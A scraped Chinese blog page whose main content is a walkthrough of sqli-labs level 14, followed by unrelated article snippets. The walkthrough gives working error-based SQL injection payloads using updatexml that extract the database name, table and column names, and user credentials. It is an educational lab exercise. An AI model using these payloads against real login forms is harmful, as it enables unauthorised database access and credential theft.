当前位置：首页 > news >正文

sqli-labs关卡14(基于post提交的双引号闭合的报错注入)通关思路

news 2025/12/30 18:09:08

文章目录

前言
一、回顾上一关知识点
二、靶场第十四关通关思路
- 1、判断注入点
- 2、爆显位
- 3、爆数据库名
- 4、爆数据库表
- 5、爆数据库列
- 6、爆数据库关键信息
总结

前言

此文章只用于学习和反思巩固sql注入知识，禁止用于做非法攻击。注意靶场是可以练习的平台，不能随意去尚未授权的网站做渗透测试！！！

一、回顾上一关知识点

上一关是典型的布尔盲注或可以报错盲注。

二、靶场第十四关通关思路

1、判断注入点
2、爆显位
3、爆数据库名
4、爆数据库表
5、爆数据库列
6、爆数据库关键信息

1、判断注入点

老规矩还是使用万能语句1 or 1=1 和 1 or 1=2发现页面正常，所以排除数字型。输入1'发现并没有报错说明可能是和双引号闭合有关，再输入1"发现报错，报错信息为

You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near ‘“1"” and password=“” LIMIT 0,1’ at line 1

通过报错信息可以知道是双引号闭合。我们构造payload

1" or 1=1#

1" or 1=2#

发现1=1页面正常，1=2页面异常
在这里插入图片描述

细心发现页面正常和异常只会出现提示successfully或failed。就像布尔盲注的ture或false。并没有回显内容。这里明显可以用布尔或者是报错盲注。这里我就用报错注入了，比较简单。

2、爆显位

注入语句为

1" order by 3#

在这里插入图片描述
发现3报错，说明有2个显位。

3、爆数据库名

注入语句为

1" or updatexml(1,concat(0x3a,(select database()),0x3a),1)#

在这里插入图片描述
得到数据库名

4、爆数据库表

注入语句为

1" or updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a),1)#

在这里插入图片描述
得到关键数据库表名users

5、爆数据库列

注入语句为

1" or updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x3a),1)#

1" or updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x3a),1)#

在这里插入图片描述

得到关键数据库列username，password

6、爆数据库关键信息

注入语句为

1" or updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1)#

1" or updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1)#

在这里插入图片描述

得到关键账号密码

总结

这一关用的是报错注入，布尔盲注也适用。如果不懂报错注入流程可以看我的文章第五关解析。此文章是小白自己为了巩固sql注入而写的，大佬路过请多指教！

sqli-labs关卡14(基于post提交的双引号闭合的报错注入)通关思路

文章目录前言一、回顾上一关知识点二、靶场第十四关通关思路1、判断注入点2、爆显位3、爆数据库名4、爆数据库表5、爆数据库列6、爆数据库关键信息总结前言此文章只用于学习和反思巩固sql注入知识，禁止用于做非法攻击。注意靶场是可以练习的平台，不…...

编程日记 2023/11/14 2:20:36

【广州华锐互动】楼宇智能化VR虚拟教学系统

在如今的技术时代，教育行业正在逐步引入各种创新方法以提升教学质量。VR公司广州华锐互动开发的楼宇智能化VR虚拟教学系统就是其中的一种，它利用虚拟现实(VR)技术，为学生提供一种全新的、沉浸式的学习体验。楼宇智能化VR虚拟教学系统涵盖综合…...

编程日记 2023/11/14 2:19:34

5. HTML常用标签

5.1 标签语义学习标签是有技巧的，重点是记住每个标签的语义。简单理解就是指标签的含义。即这个标签是用来干嘛的。根据标签的语义，在合适的地方给一个最为合理的标签。可以让页面结构给清晰。 5.2 标题标签 <h1>-<h6>(重要) HTML提供了…...

编程日记 2023/11/14 2:18:34

傅里叶分析（2）

在《傅里叶分析（1）》中，讲述了连续信号的傅里叶分析方法，本文讲述离散信号的傅里叶分析方法。虽然电、声、光、机械振动等信号在物理上是连续函数，但在实际工程中，其通常为离散信号，即若干离散…...

编程日记 2023/11/14 2:17:31

转载自：https://blog.csdn.net/Numb_ZL/article/details/124222795 查看用户已有权限 SHOW GRANTS FOR [用户名];使用root用户授予所有权限 -- 授权 GRANT ALL PRIVILEGES ON [数据库名].[表明] TO [用户名][连接主机ip地址] WITH GRANT OPTION; -- 刷新权限 FLU…...

编程日记 2023/11/14 2:16:31

reticulate | R-python调用 | 安装及配置 | conda文件配置

reticulate | R-python安装及配置 | conda文件配置 1. 基础知识2. 安装reticulate from CRAN3. 包含了用于Python和R之间协同操作的全套工具，在R和Rstudio中均可使用4. 配置python环境4.1 4种环境配置方式4.2 miniconda 环境install_miniconda()报错一install_minic…...

编程日记 2023/11/14 2:15:29

VueRequest——管理请求状态库

文章目录前言一、为什么选择 VueRequest？二、使用步骤1.安装2.用例前言 VueRequest——开发文档 VueReques——GitHub地址在以往的业务项目中，我们经常会被 loading 状态的管理、请求的节流防抖、接口数据的缓存、分页等重复的功能实现所困扰。每次开…...

编程日记 2023/11/14 2:14:28

GPT-4 Turbo 发布 | 大模型训练的新时代：超算互联网的调度与调优

★OpenAI；ChatGPT;Sam Altman；Assistance API；GPT4 Turbo；DALL-E 3；多模态交互；算力调度；算力调优；大模型训练；GH200；snowflake；AGI；A…...

编程日记 2023/11/14 2:13:28

Django路由层

路由层（urls） Django的路由层是负责将用户请求映射到相应的视图函数的一层。在Django的MVT架构中，路由层负责处理用户的请求，然后将请求交给相应的视图函数进行处理，最后将处理结果返回给用户。在Django中&#xff0c…...

编程日记 2023/11/14 2:12:26

关于session的不断变化问题

今天在帮同学解决一个小问题，差点阴沟翻船。问题再现：他从github上拉了一个项目下来跑，结果发生跑不通问题出现在验证码一直不对。我一看项目源码，验证码生成后存储再session中了，等用户发送请求验证的时候sessionI…...

编程日记 2023/11/14 2:11:25

eNSP启动路由器一直出#号、以为是安装配置winpcap的问题。。。。（以为是win10安装winpcap失败的问题。。。）

问题描述：eNSP启动一直出#号的一种参考方法_ensp一直#_Hong的博客-CSDN博客原因是看了这篇博客，觉得ensp启动路由器的时候一直出现＃号是因为winpcap安装的时候出现的问题。查看自己的winpcap安装成功之后的目录是： 然后因为那篇…...

编程日记 2023/11/14 2:10:23

时间序列预测：深度学习、机器学习、融合模型、创新模型实战案例（附代码+数据集+原理介绍）

本文介绍->给大家推荐一下我的时间序列预测实战专栏，本专栏平均质量分98分，而且本专栏目前免费阅读。其中涉及机器学习、深度学习、融合模型、个人创新模型、数据分析等一系列有关时间序列的内容，其中的实战案例不仅有简单的模型类似于机器…...

编程日记 2023/11/14 2:09:22

docker安装RocketMQ

1、RocketMQ基本概念 1.1 消息模型（Message Model） RocketMQ主要由Producer、Broker、Consumer三部分组成，其中Producer负责生产消息，Consumer负责消费消息，Broker负责存储消息。Broker在实际部署过程中对应一台服务…...

编程日记 2023/11/14 2:08:19

优秀智慧园区案例 - 珠海华发智慧园区，万字长文解析先进智慧园区建设方案经验

一、项目背景珠海华发产业园运营管理有限公司（简称“产业园公司”）是2016年起连续五年跻身“中国企业500强”、国务院国企改革“双百企业”的珠海华发集团旗下的实体产业发展载体运营平台，依托“四园一基地”：中以国际产业园、信…...

编程日记 2023/11/14 2:07:18

毕业设计项目：基于java+springboot的共享单车信息网站

运行环境开发语言：Java 框架：springboot JDK版本：JDK1.8 服务器：tomcat7 数据库：mysql 5.7（一定要5.7版本） 数据库工具：Navicat11 开发软件：eclipse/myeclipse/idea Ma…...

编程日记 2023/11/14 2:06:17

Redis 连接不上 WRONGPASS invalid username-password pair

1.我的RedisDesktopManager 可以连接但是 Springboot远程使用Redis就是连不上 2.我的密码是 abc123.. 多了英文的 ..符号在Springboot过不了，所以Redis密码尽量字母数字，不要其他符号...

编程日记 2023/11/14 2:05:15

三分钟学完Git版本控制常用指令

基本指令 git clone [url] 克隆远程仓库到本地 git clone https://gitee.com/mayun2023a/mprpc.git2.git checkout -b xxx 切换至新分支xxx（相当于复制了remote的仓库到本地的xxx分支上) 3.修改或者添加本地代码（部署在硬盘的源文件上） 4.g…...

编程日记 2023/11/14 2:04:15

vue3使用粒子特效

安装 //使用npm安装 npm install particles.vue3 --save//使用yarn安装 yarn add particles.vue3 --save//必须得装 npm i tsparticles 使用 main.js import Particles from particles.vue3 const app createApp(App) app.use(Particles)//使用粒子特效页面使用 <sc…...

编程日记 2023/11/14 2:03:13

DMDEM部署说明-详细步骤-(DM8达梦数据库)

DMDEM部署说明-详细步骤-DM8达梦数据库环境介绍1 部署DM8 数据库1.1 创建一个数据库作为DEM后台数据库1.2 创建数据库用户 DEM1.3 使用DEM用户导入dem_init.sql 2 配置tomcat2.1 配置/tomcat/conf/server.xml2.2 修改jvm启动参数 3 配置JAVA 1.8及以上版本的运行时环境3.1 配置…...

编程日记 2023/11/14 2:02:13

aws亚马逊：什么是 Amazon EC2？

Amazon Elastic Compute Cloud（Amazon EC2）在 Amazon Web Services（AWS）云中按需提供可扩展的计算容量。使用 Amazon EC2 可以降低硬件成本，因此您可以更快地开发和部署应用程序。您可以使用 Amazon EC2 启动所需数量的…...

编程日记 2023/11/14 2:01:12

Spark 之入门讲解详细版（1）

1、简介 1.1 Spark简介 Spark是加州大学伯克利分校AMP实验室（Algorithms, Machines, and People Lab）开发通用内存并行计算框架。Spark在2013年6月进入Apache成为孵化项目，8个月后成为Apache顶级项目，速度之快足见过人之处&…...

编程新知 2025/12/29 11:15:32

css实现圆环展示百分比，根据值动态展示所占比例

代码如下 <view class""><view class"circle-chart"><view v-if"!!num" class"pie-item" :style"{background: conic-gradient(var(--one-color) 0%,#E9E6F1 ${num}%),}"></view><view v-else …...

编程新知 2025/12/10 15:22:31